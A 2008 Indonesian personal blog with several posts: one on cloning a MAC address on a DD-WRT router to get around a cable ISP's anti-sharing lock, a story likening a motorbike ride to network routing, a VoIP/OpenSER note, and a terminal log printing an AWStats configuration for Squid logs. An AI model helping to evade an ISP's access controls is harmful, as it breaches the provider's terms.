Saturday, August 09, 2008

mac address spoofing ( Fastnet )

di kamar sambil menyalakan pc akhirnya sempetin buka blog lagi , beruntung tinggal di daerah yang sudah terjangkau oleh tv cable + internet juga , lumayan lah koneksi yang hebatnya neh koneksi tv cable ini bisa 100 kbps waaaaah kapan naiknya ya ... perasaan kmaren cuma 50 kbps ... asyik deehh .......



ok back to mac address , saya tau kenapa fastnet ini lock menggunakan mac address ... supaya gak si share tuh ...

kebetulan dirumah sih ada hotspot dan menggunakan wifi wrt54gl ( ios nya sudah di upgrade dd-wrt ) sudah mendukung mac address cloning ...



akhirnya share deh ......

)*

Routing ... pak penari ...

Sambil tersipu malu .. bapak itu meminta tolong kepada saya ..
"ade mau kemana bapak numpang donk de"
aku : "saya mau pulang pak"
"saya boleh numpang gak de sampai kampung rambutan"
aku : "silahkan pak naik motor saya"
"maaf kalau saya merepoti ade "
aku : "ah gak apa2x pak".

yah sepanjang jalan dia cerita bahwa dia adalah penari untuk acara pernikahan temanku .. didalam suatu pesta pernikahan biasanya ada yang menari dan itulah dia , sambil becerita dia tentang dirinya dan dia mempunyai anak 4 .. dibalik mukanya itu masih ada bekas make up ya mungkin itulah profesi sebagai penari ... , ya setelah sampai terminal kampung rambutan ... dia terus menyesali dirinya telah merepotkan aku , aku bilang tidak apa2x dan aku bilang sama bapak itu agar berhati-hati.

dia menginginkan menaiki bus ke arah grogol ... tetapi yang dia minta untuk naik dari pasar minggu ...

wah untuk mempersingkat perjalanan akhirnya aku terpaksa menginginkan melewati kampung rambutan .. karena dari sana aku bisa bebas ke arah yang berbeda ..

artinya sepanjang perjalanan tersebut saya melalui satu titik lalu ... memecah menjadi 2 titik

bapak tersebut kearah tol grogol lalu saya ke arah pondok gede ...

begitulah routing ... sambil berlalu kupacu kendaraanku melewati asrama haji pondok gede , melihat bensin mengarah habis , ku terpaksa singgah melalui pom bensin yang ada

"20000 rb pak " , penunjuk bensin penuh kembali ..

sepanjang perjalanan aku berfikir ... "inilah routing itu ..."

*)sore .....

Thursday, August 07, 2008

OPENSER VERSI KU ... ( VOIP )


Sambil denger Streaming Server : http://10.11.21.200:9000/D%27MASIV/D%27Masiv%20-%20Cinta%20Sampai%20Disini.mp3 , DMASIV :D cinta sampai disini ....

Streaming server emang mantep berguna juga , bagusnya cloud nya 10.x.x.x , kalo yang mau silahkan di http://10.11.21.200:9000 , mungkin aja saya satu network dengan mu dan mungkin saja saya di ip 10.x.x.x dan mungkin saja saya ada di system kamu :D bercokol di tempat mu membaca semua log2x mu , EOF

OPENSER : http://www.sekuritionline.net/artikel/openser.pdf by me .........

Next Time Install Streaming MP3

Counter pengunjung hit di situs melalui squid - awstats

kalau datanya sedikit sih ok , cuma banyak banget hahahahahahaha sampe gw ngakak sendiri liat neh log cuma configure yang perlu diambil access.log.* yang di log squidnya di salah satu situs < 100 besar di indonesia ........

ContentKrtRack09-WebAcc03 squid # ls -la
total 556932
drwxr-x--- 2 squid squid 4096 Aug 7 04:02 .
drwxr-xr-x 16 root root 4096 Aug 7 13:35 ..
-rw-r----- 1 squid squid 152194900 Aug 7 15:03 access.log
-rw-r----- 1 squid squid 17406611 Jul 29 04:02 access.log.10.gz
-rw-r----- 1 squid squid 8956939 Jul 28 04:02 access.log.11.gz
-rw-r----- 1 squid squid 10796618 Jul 27 04:02 access.log.12.gz
-rw-r----- 1 squid squid 14506617 Jul 26 04:02 access.log.13.gz
-rw-r----- 1 squid squid 16914358 Jul 25 04:02 access.log.14.gz
-rw-r----- 1 squid squid 13603913 Jul 24 04:02 access.log.15.gz
-rw-r----- 1 squid squid 16074466 Jul 23 04:02 access.log.16.gz
-rw-r----- 1 squid squid 16285286 Jul 22 04:02 access.log.17.gz
-rw-r----- 1 squid squid 8277129 Jul 21 04:02 access.log.18.gz
-rw-r----- 1 squid squid 12281981 Jul 20 04:02 access.log.19.gz
-rw-r----- 1 squid squid 16905386 Aug 7 04:02 access.log.1.gz
-rw-r----- 1 squid squid 16788752 Jul 19 04:02 access.log.20.gz
-rw-r----- 1 squid squid 15363003 Jul 18 04:02 access.log.21.gz
-rw-r----- 1 squid squid 15478287 Jul 17 04:02 access.log.22.gz
-rw-r----- 1 squid squid 13511637 Jul 16 04:02 access.log.23.gz
-rw-r----- 1 squid squid 12095348 Jul 15 04:02 access.log.24.gz
-rw-r----- 1 squid squid 6604372 Jul 14 04:02 access.log.25.gz
-rw-r----- 1 squid squid 8683953 Jul 13 04:02 access.log.26.gz
-rw-r----- 1 squid squid 12513345 Jul 12 04:02 access.log.27.gz
-rw-r----- 1 squid squid 12790825 Jul 11 04:02 access.log.28.gz
-rw-r----- 1 squid squid 12467356 Jul 10 04:02 access.log.29.gz
-rw-r----- 1 squid squid 20719113 Aug 6 04:02 access.log.2.gz
-rw-r----- 1 squid squid 17552139 Jul 9 04:02 access.log.30.gz
-rw-r----- 1 squid squid 18802517 Aug 5 04:02 access.log.3.gz
-rw-r----- 1 squid squid 7590487 Aug 4 04:02 access.log.4.gz
-rw-r----- 1 squid squid 12110151 Aug 3 04:02 access.log.5.gz
-rw-r----- 1 squid squid 15716406 Aug 2 04:02 access.log.6.gz
-rw-r----- 1 squid squid 17024168 Aug 1 04:02 access.log.7.gz
-rw-r----- 1 squid squid 12608621 Jul 31 04:02 access.log.8.gz
-rw-r----- 1 squid squid 16717633 Jul 30 04:02 access.log.9.gz
-rw-r----- 1 squid squid 19649 Aug 7 14:37 cache.log
-rw-r----- 1 squid squid 1157 Jul 29 04:02 cache.log.10.gz
-rw-r----- 1 squid squid 781 Jul 28 04:02 cache.log.11.gz
-rw-r----- 1 squid squid 1746 Jul 27 04:02 cache.log.12.gz
-rw-r----- 1 squid squid 1738 Jul 26 04:02 cache.log.13.gz
-rw-r----- 1 squid squid 1829 Jul 25 04:02 cache.log.14.gz
-rw-r----- 1 squid squid 1052 Jul 24 04:02 cache.log.15.gz
-rw-r----- 1 squid squid 1240 Jul 23 04:02 cache.log.16.gz
-rw-r----- 1 squid squid 3058 Jul 22 04:02 cache.log.17.gz
-rw-r----- 1 squid squid 582 Jul 21 04:02 cache.log.18.gz
-rw-r----- 1 squid squid 1214 Jul 20 04:02 cache.log.19.gz
-rw-r----- 1 squid squid 1992 Aug 7 04:02 cache.log.1.gz
-rw-r----- 1 squid squid 1840 Jul 19 04:02 cache.log.20.gz
-rw-r----- 1 squid squid 1202 Jul 18 04:02 cache.log.21.gz
-rw-r----- 1 squid squid 1377 Jul 17 04:02 cache.log.22.gz
-rw-r----- 1 squid squid 1252 Jul 16 04:02 cache.log.23.gz
-rw-r----- 1 squid squid 841 Jul 15 04:02 cache.log.24.gz
-rw-r----- 1 squid squid 936 Jul 14 04:02 cache.log.25.gz
-rw-r----- 1 squid squid 2451 Jul 13 04:02 cache.log.26.gz
-rw-r----- 1 squid squid 1400 Jul 12 04:02 cache.log.27.gz
-rw-r----- 1 squid squid 2033 Jul 11 04:02 cache.log.28.gz
-rw-r----- 1 squid squid 1066 Jul 10 04:02 cache.log.29.gz
-rw-r----- 1 squid squid 1568 Aug 6 04:02 cache.log.2.gz
-rw-r----- 1 squid squid 2248 Jul 9 04:02 cache.log.30.gz
-rw-r----- 1 squid squid 1342 Aug 5 04:02 cache.log.3.gz
-rw-r----- 1 squid squid 710 Aug 4 04:02 cache.log.4.gz
-rw-r----- 1 squid squid 1403 Aug 3 04:02 cache.log.5.gz
-rw-r----- 1 squid squid 1614 Aug 2 04:02 cache.log.6.gz
-rw-r----- 1 squid squid 2238 Aug 1 04:02 cache.log.7.gz
-rw-r----- 1 squid squid 578 Jul 31 04:02 cache.log.8.gz
-rw-r----- 1 squid squid 1556 Jul 30 04:02 cache.log.9.gz
-rw-r--r-- 1 root root 1766 May 3 2007 squid.out

=~=~=~=~=~=~=~=~=~=~=~= PuTTY log 2008.08.07 15:01:03 =~=~=~=~=~=~=~=~=~=~=~=

ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # ps -aux
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # ps -aux
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # w
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # c
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # c
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # ca
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # ca
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /e
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /e
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /et
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /et
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/a
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/a
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/aw
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/aw
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/a
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/a
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/aw
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/aw
ContentKrtRack09-WebAcc03 squid # 
ContentKrtRack09-WebAcc03 squid # cat /etc/awstats/awstats.squid.conf
# AWSTATS CONFIGURE FILE 6.8

#-----------------------------------------------------------------------------

# Copy this file into awstats.www.mydomain.conf and edit this new config file

# to setup AWStats (See documentation in docs/ directory).

# The config file must be in /etc/awstats, /usr/local/etc/awstats or /etc (for

# Unix/Linux) or same directory than awstats.pl (Windows, Mac, Unix/Linux...)

# To include an environment variable in any parameter (AWStats will replace

# it with its value when reading it), follow the example:

# Parameter="__ENVNAME__"

# Note that environment variable AWSTATS_CURRENT_CONFIG is always defined with

# the config value in an AWStats running session and can be used like others.

#-----------------------------------------------------------------------------

# $Revision: 1.333 $ - $Author: eldy $ - $Date: 2008/02/26 01:33:59 $







#-----------------------------------------------------------------------------

# MAIN SETUP SECTION (Required to make AWStats work)

#-----------------------------------------------------------------------------



# "LogFile" contains the web, ftp or mail server log file to analyze.

# Possible values: A full path, or a relative path from awstats.pl directory.

# Example: "/var/log/apache/access.log"

# Example: "../logs/mycombinedlog.log"

# You can also use tags in this filename if you need a dynamic file name

# depending on date or time (Replacement is made by AWStats at the beginning

# of its execution). This is available tags :

# %YYYY-n is replaced with 4 digits year we were n hours ago

# %YY-n is replaced with 2 digits year we were n hours ago

# %MM-n is replaced with 2 digits month we were n hours ago

# %MO-n is replaced with 3 letters month we were n hours ago

# %DD-n is replaced with day we were n hours ago

# %HH-n is replaced with hour we were n hours ago

# %NS-n is replaced with number of seconds at 00:00 since 1970

# %WM-n is replaced with the week number in month (1-5)

# %Wm-n is replaced with the week number in month (0-4)

# %WY-n is replaced with the week number in year (01-52)

# %Wy-n is replaced with the week number in year (00-51)

# %DW-n is replaced with the day number in week (1-7, 1=sunday)

# use n=24 if you need (1-7, 1=monday)

# %Dw-n is replaced with the day number in week (0-6, 0=sunday)

# use n=24 if you need (0-6, 0=monday)

# Use 0 for n if you need current year, month, day, hour...

# Example: "/var/log/access_log.%YYYY-0%MM-0%DD-0.log"

# Example: "C:/WINNT/system32/LogFiles/W3SVC1/ex%YY-24%MM-24%DD-24.log"

# You can also use a pipe if log file come from a pipe :

# Example: "gzip -d
# If there are several log files from load balancing servers :

# Example: "/pathtotools/logresolvemerge.pl *.log |"

#

LogFile="gzip -cdf /var/log/squid/access.log.* |"





# Enter the log file type you want to analyze.

# Possible values:

# W - For a web log file

# S - For a streaming log file

# M - For a mail log file

# F - For a ftp log file

# Example: W

# Default: W

#

LogType=W





# Enter here your log format (Must match your web server config. See setup

# instructions in documentation to know how to configure your web server to

# have the required log format).

# Possible values: 1,2,3,4 or "your_own_personalized_log_format"

# 1 - Apache or Lotus Notes/Domino native combined log format (NCSA combined/XLF/ELF log format)

# 2 - IIS or ISA format (IIS W3C log format). See FAQ-COM115 For ISA.

# 3 - Webstar native log format.

# 4 - Apache or Squid native common log format (NCSA common/CLF log format)

# With LogFormat=4, some features (browsers, os, keywords...) can't work.

# "your_own_personalized_log_format" = If your log is ftp, mail or other format,

# you must use following keys to define the log format string (See FAQ for

# ftp, mail or exotic web log format examples):

# %host Client hostname or IP address (or Sender host for mail log)

# %host_r Receiver hostname or IP address (for mail log)

# %lognamequot Authenticated login/user with format: "john"

# %logname Authenticated login/user with format: john

# %time1 Date and time with format: [dd/mon/yyyy:hh:mm:ss +0000] or [dd/mon/yyyy:hh:mm:ss]

# %time2 Date and time with format: yyyy-mm-dd hh:mm:ss

# %time3 Date and time with format: Mon dd hh:mm:ss or Mon dd hh:mm:ss yyyy

# %time4 Date and time with unix timestamp format: dddddddddd

# %methodurl Method and URL with format: "GET /index.html HTTP/x.x"

# %methodurlnoprot Method and URL with format: "GET /index.html"

# %method Method with format: GET

# %url URL only with format: /index.html

# %query Query string (used by URLWithQuery option)

# %code Return code status (with format for web log: 999)

# %bytesd Size of document in bytes

# %refererquot Referer page with format: "http://from.com/from.htm"

# %referer Referer page with format: http://from.com/from.htm

# %uabracket User agent with format: [Mozilla/4.0 (compatible, ...)]

# %uaquot User agent with format: "Mozilla/4.0 (compatible, ...)"

# %ua User agent with format: Mozilla/4.0_(compatible...)

# %gzipin mod_gzip compression input bytes: In:XXX

# %gzipout mod_gzip compression output bytes & ratio: Out:YYY:ZZpct.

# %gzipratio mod_gzip compression ratio: ZZpct.

# %deflateratio mod_deflate compression ratio with format: (ZZ)

# %email EMail sender (for mail log)

# %email_r EMail receiver (for mail log)

# %virtualname Web sever virtual hostname. Use this tag when same log

# contains data of several virtual web servers. AWStats

# will discard records not in SiteDomain nor HostAliases

# %cluster If log file is provided from several computers (merged by

# logresolvemerge.pl), use this to define cluster id field.

# %extraX Another field that you plan to use for building a

# personalized report with ExtraSection feature (See later).

# If your log format has some fields not included in this list, use:

# %other Means another not used field

# %otherquot Means another not used double quoted field

#

# Examples for Apache combined logs (following two examples are equivalent):

# LogFormat = 1

# LogFormat = "%host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot"

#

# Example for IIS:

# LogFormat = 2

#

#LogFormat=1

LogFormat="%host %other %logname %time1 %methodurl %code %bytesd %other"




# If your log field's separator is not a space, you can change this parameter.

# This parameter is not used if LogFormat is a predefined value (1,2,3,4)

# Backslash can be used as escape character.

# Example: " "

# Example: "\t"

# Example: "\|"

# Example: ","

# Default: " "

#

LogSeparator=" "





# "SiteDomain" must contain the main domain name, or the main intranet web

# server name, used to reach the web site.

# If you share the same log file for several virtual web servers, this

# parameter is used to tell AWStats to filter record that contains records for

# this virtual host name only (So check that this virtual hostname can be

# found in your log file and use a personalized log format that include the

# %virtualname tag).

# But for multi hosting a better solution is to have one log file for each

# virtual web server. In this case, this parameter is only used to generate

# full URL's links when ShowLinksOnUrl option is set to 1.

# If analyzing mail log, enter here the domain name of mail server.

# Example: "myintranetserver"

# Example: "www.domain.com"

# Example: "ftp.domain.com"

# Example: "domain.com"

#

SiteDomain="squid"




# Enter here all other possible domain names, addresses or virtual host

# aliases someone can use to access your site. Try to keep only the minimum

# number of possible names/addresses to have the best performances.

# You can repeat the "SiteDomain" value in this list.

# This parameter is used to analyze referer field in log file and to help

# AWStats to know if a referer URL is a local URL of same site or an URL of

# another site.

# Note: Use space between each value.

# Note: You can use regular expression values writing value with REGEX[value].

# Note: You can also use @/mypath/myfile if list of aliases are in a file.

# Example: "www.myserver.com localhost 127.0.0.1 REGEX[mydomain\.(net|org)$]"

#

HostAliases="squid www.squid 127.0.0.1 localhost"




# If you want to have hosts reported by name instead of ip address, AWStats

# need to make reverse DNS lookups (if not already done in your log file).

# With DNSLookup to 0, all hosts will be reported by their IP addresses and

# not by the full hostname of visitors (except if names are already available

# in log file).

# If you want/need to set DNSLookup to 1, don't forget that this will reduce

# dramatically AWStats update process speed. Do not use on large web sites.

# Note: Reverse DNS lookup is done on IPv4 only (Enable ipv6 plugin for IPv6).

# Note: Result of DNS Lookup can be used to build the Country report. However

# it is highly recommanded to enable the plugin 'geoip' or 'geoipfree' to

# have an accurate Country report with no need of DNS Lookup.

# Possible values:

# 0 - No DNS Lookup

# 1 - DNS Lookup is fully enabled

# 2 - DNS Lookup is made only from static DNS cache file (if it exists)

# Default: 2

#

DNSLookup=2





# When AWStats updates its statistics, it stores results of its analysis in

# files (AWStats database). All those files are written in the directory

# defined by the "DirData" parameter. Set this value to the directory where

# you want AWStats to save its database and working files into.

# Warning: If you want to be able to use the "AllowToUpdateStatsFromBrowser"

# feature (see later), you need "Write" permissions by web server user on this

# directory (and "Modify" for Windows NTFS file systems).

# Example: "/var/lib/awstats"

# Example: "../data"

# Example: "C:/awstats_data_dir"

# Default: "." (means same directory as awstats.pl)

#

DirData="/var/lib/awstats"




# Relative or absolute web URL of your awstats cgi-bin directory.

# This parameter is used only when AWStats is run from command line

# with -output option (to generate links in HTML reported page).

# Example: "/awstats"

# Default: "/cgi-bin" (means awstats.pl is in "/yourwwwroot/cgi-bin")

#

DirCgi="/cgi-bin"





# Relative or absolute web URL of your awstats icon directory.

# If you build static reports ("... -output > outputpath/output.html"), enter

# path of icon directory relative to the output directory 'outputpath'.

# Example: "/awstatsicons"

# Example: "../icon"

# Default: "/icon" (means you must copy icon directories in "/mywwwroot/icon")

#

DirIcons="/icon"





# When this parameter is set to 1, AWStats adds a button on report page to

# allow to "update" statistics from a web browser. Warning, when "update" is

# made from a browser, AWStats is run as a CGI by the web server user defined

# in your web server (user "nobody" by default with Apache, "IUSR_XXX" with

# IIS), so the "DirData" directory and all already existing history files

# awstatsMMYYYY[.xxx].txt must be writable by this user. Change permissions if

# necessary to "Read/Write" (and "Modify" for Windows NTFS file systems).

# Warning: Update process can be long so you might experience "time out"

# browser errors if you don't launch AWStats frequently enough.

# When set to 0, update is only made when AWStats is run from the command

# line interface (or a task scheduler).

# Possible values: 0 or 1

# Default: 0

#

AllowToUpdateStatsFromBrowser=0





# AWStats saves and sorts its database on a month basis (except if using

# databasebreak option from command line).

# However, if you choose the -month=all from command line or

# value '-Year-' from CGI combo form to have a report for all year, AWStats

# needs to reload all data for full year (each month), and sort them,

# requiring a large amount of time, memory and CPU. This might be a problem

# for web hosting providers that offer AWStats for large sites, on shared

# servers, to non CPU cautious customers.

# For this reason, the 'full year' is only enabled on Command Line by default.

# You can change this by setting this parameter to 0, 1, 2 or 3.

# Possible values:

# 0 - Never allowed

# 1 - Allowed on CLI only, -Year- value in combo is not visible

# 2 - Allowed on CLI only, -Year- value in combo is visible but not allowed

# 3 - Possible on CLI and CGI

# Default: 2

#

AllowFullYearView=2







#-----------------------------------------------------------------------------

# OPTIONAL SETUP SECTION (Not required but increase AWStats features)

#-----------------------------------------------------------------------------



# When the update process runs, AWStats can set a lock file in TEMP or TMP

# directory. This lock is to avoid to have 2 update processes running at the

# same time to prevent unknown conflicts problems and avoid DoS attacks when

# AllowToUpdateStatsFromBrowser is set to 1.

# Because, when you use lock file, you can experience sometimes problems in

# lock file not correctly removed (killed process for example requires that

# you remove the file manualy), this option is not enabled by default (Do

# not enable this option with no console server access).

# Change : Effective immediatly

# Possible values: 0 or 1

# Default: 0

#

EnableLockForUpdate=0





# AWStats can do reverse DNS lookups through a static DNS cache file that was

# previously created manually. If no path is given in static DNS cache file

# name, AWStats will search DirData directory. This file is never changed.

# This option is not used if DNSLookup=0.

# Note: DNS cache file format is 'minsince1970 ipaddress resolved_hostname'

# or just 'ipaddress resolved_hostname'

# Change : Effective for new updates only

# Example: "/mydnscachedir/dnscache"

# Default: "dnscache.txt"

#

DNSStaticCacheFile="dnscache.txt"





# AWStats can do reverse DNS lookups through a DNS cache file that was created

# by a previous run of AWStats. This file is erased and recreated after each

# statistics update process. You don't need to create and/or edit it.

# AWStats will read and save this file in DirData directory.

# This option is used only if DNSLookup=1.

# Note: If a DNSStaticCacheFile is available, AWStats will check for DNS

# lookup in DNSLastUpdateCacheFile after checking into DNSStaticCacheFile.

# Change : Effective for new updates only

# Example: "/mydnscachedir/dnscachelastupdate"

# Default: "dnscachelastupdate.txt"

#

DNSLastUpdateCacheFile="dnscachelastupdate.txt"





# You can specify specific IP addresses that should NOT be looked up in DNS.

# This option is used only if DNSLookup=1.

# Note: Use space between each value.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "123.123.123.123 REGEX[^192\.168\.]"

# Default: ""

#

SkipDNSLookupFor=""





# The following two parameters allow you to protect a config file from being

# read by AWStats when called from a browser if web user has not been

# authenticated. Your AWStats program must be in a web protected "realm" (With

# Apache, you can use .htaccess files to do so. With other web servers, see

# your server setup manual).

# Change : Effective immediatly

# Possible values: 0 or 1

# Default: 0

#

AllowAccessFromWebToAuthenticatedUsersOnly=0





# This parameter gives the list of all authorized authenticated users to view

# statistics for this domain/config file. This parameter is used only if

# AllowAccessFromWebToAuthenticatedUsersOnly is set to 1.

# Change : Effective immediatly

# Example: "user1 user2"

# Example: "__REMOTE_USER__"

# Default: ""

#

AllowAccessFromWebToFollowingAuthenticatedUsers=""





# When this parameter is defined to something, the IP address of the user that

# reads its statistics from a browser (when AWStats is used as a CGI) is

# checked and must match one of the IP address values or ranges.

# Change : Effective immediatly

# Example: "127.0.0.1 123.123.123.1-123.123.123.255"

# Default: ""

#

AllowAccessFromWebToFollowingIPAddresses=""





# If the "DirData" directory (see above) does not exist, AWStats return an

# error. However, you can ask AWStats to create it.

# This option can be used by some Web Hosting Providers that has defined a

# dynamic value for DirData (for example DirData="/home/__REMOTE_USER__") and

# don't want to have to create a new directory each time they add a new user.

# Change : Effective immediatly

# Possible values: 0 or 1

# Default: 0

#

CreateDirDataIfNotExists=0





# You can choose in which format the Awstats history database is saved.

# Note: Using "xml" format make AWStats building database files three times

# larger than using "text" format.

# Change : Database format is switched after next update

# Possible values: text or xml

# Default: text

#

BuildHistoryFormat=text





# If you prefer having the report output pages be built as XML compliant pages

# instead of simple HTML pages, you can set this to 'xhtml' (May not work

# properly with old browsers).

# Change : Effective immediatly

# Possible values: html or xhtml

# Default: html

#

BuildReportFormat=html





# AWStats databases can be updated from command line of from a browser (when

# used as a cgi program). So AWStats database files need write permission

# for both command line user and default web server user (nobody for Unix,

# IUSR_xxx for IIS/Windows,...).

# To avoid permission problems between update process (run by an admin user)

# and CGI process (ran by a low level user), AWStats can save its database

# files with read and write permissions for everyone.

# By default, AWStats keeps default user permissions on updated files. If you

# set AllowToUpdateStatsFromBrowser to 1, you can change this parameter to 1.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

SaveDatabaseFilesWithPermissionsForEveryone=0





# AWStats can purge log file, after analyzing it. Note that AWStats is able

# to detect new lines in a log file, to process only them, so you can launch

# AWStats as often as you want, even with this parameter to 0.

# With 0, no purge is made, so you must use a scheduled task or a web server

# that make this purge frequently.

# With 1, the purge of the log file is made each time AWStats update is run.

# This parameter doesn't work with IIS (This web server doesn't let its log

# file to be purged).

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

PurgeLogFile=0





# When PurgeLogFile is setup to 1, AWStats will clean your log file after

# processing it. You can however keep an archive file of all processed log

# records by setting this parameter (For example if you want to use another

# log analyzer). The archived log file is saved in "DirData" with name

# awstats_archive.configname[.suffix].log

# This parameter is not used if PurgeLogFile=0

# Change : Effective for new updates only

# Possible values: 0, 1, or tags (See LogFile parameter) for suffix

# Example: 1

# Example: %YYYY%MM%DD

# Default: 0

#

ArchiveLogRecords=0





# Each time you run the update process, AWStats overwrites the 'historic file'

# for the month (awstatsMMYYYY[.*].txt) with the updated one.

# When write errors occurs (IO, disk full,...), this historic file can be

# corrupted and must be deleted. Because this file contains information of all

# past processed log files, you will loose old stats if removed. So you can

# ask AWStats to save last non corrupted file in a .bak file. This file is

# stored in "DirData" directory with other 'historic files'.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

KeepBackupOfHistoricFiles=0





# Default index page name for your web server.

# Change : Effective for new updates only

# Example: "index.php index.html default.html"

# Default: "index.html"

#

DefaultFile="index.html"





# Do not include access from clients that match following criteria.

# If your log file contains IP addresses in host field, you must enter here

# matching IP addresses criteria.

# If DNS lookup is already done in your log file, you must enter here hostname

# criteria, else enter ip address criteria.

# The opposite parameter of "SkipHosts" is "OnlyHosts".

# Note: Use space between each value. This parameter is not case sensitive.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "127.0.0.1 REGEX[^192\.168\.] REGEX[^10\.]"

# Example: "localhost REGEX[^.*\.localdomain$]"

# Default: ""

#

SkipHosts=""





# Do not include access from clients with a user agent that match following

# criteria. If you want to exclude a robot, you should update the robots.pm

# file instead of this parameter.

# The opposite parameter of "SkipUserAgents" is "OnlyUserAgents".

# Note: Use space between each value. This parameter is not case sensitive.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "konqueror REGEX[ua_test_v\d\.\d]"

# Default: ""

#

SkipUserAgents=""





# Use SkipFiles to ignore access to URLs that match one of following entries.

# You can enter a list of not important URLs (like framed menus, hidden pages,

# etc...) to exclude them from statistics. You must enter here exact relative

# URL as found in log file, or a matching REGEX value. Check apply on URL with

# all its query paramaters.

# For example, to ignore /badpage.php, just add "/badpage.php". To ignore all

# pages in a particular directory, add "REGEX[^\/directorytoexclude]".

# The opposite parameter of "SkipFiles" is "OnlyFiles".

# Note: Use space between each value. This parameter is or not case sensitive

# depending on URLNotCaseSensitive parameter.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "/badpage.php /page.php?param=x REGEX[^\/excludedirectory]"

# Default: ""

#

SkipFiles=""





# Use SkipReferrersBlackList if you want to exclude records coming from a SPAM

# referrer. Parameter must receive a local file name containing rules applied

# on referrer field. If parameter is empty, no filter is applied.

# An example of such a file is available in lib/blacklist.txt

# You can download updated version at http://www.jayallen.org/comment_spam/

# Change : Effective for new updates only

# Example: "/mylibpath/blacklist.txt"

# Default: ""

#

# WARNING!! Using this feature make AWStats running very slower (5 times slower

# with black list file provided with AWStats !

#

SkipReferrersBlackList=""





# Include in stats, only accesses from hosts that match one of following

# entries. For example, if you want AWStats to filter access to keep only

# stats for visits from particular hosts, you can add those host names in

# this parameter.

# If DNS lookup is already done in your log file, you must enter here hostname

# criteria, else enter ip address criteria.

# The opposite parameter of "OnlyHosts" is "SkipHosts".

# Note: Use space between each value. This parameter is not case sensitive.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "127.0.0.1 REGEX[^192\.168\.] REGEX[^10\.]"

# Default: ""

#

OnlyHosts=""





# Include in stats, only accesses from user agent that match one of following

# entries. For example, if you want AWStats to filter access to keep only

# stats for visits from particular browsers, you can add their user agents

# string in this parameter.

# The opposite parameter of "OnlyUserAgents" is "SkipUserAgents".

# Note: Use space between each value. This parameter is not case sensitive.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "msie"

# Default: ""

#

OnlyUserAgents=""





# Include in stats, only accesses from authenticated users that match one of

# following entries. For example, if you want AWStats to filter access to keep

# only stats for authenticated users, you can add those users names in

# this parameter. Useful for statistics for per user ftp logs.

# Note: Use space between each value. This parameter is not case sensitive.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "john bob REGEX[^testusers]"

# Default: ""

#

OnlyUsers=""





# Include in stats, only accesses to URLs that match one of following entries.

# For example, if you want AWStats to filter access to keep only stats that

# match a particular string, like a particular directory, you can add this

# directory name in this parameter.

# The opposite parameter of "OnlyFiles" is "SkipFiles".

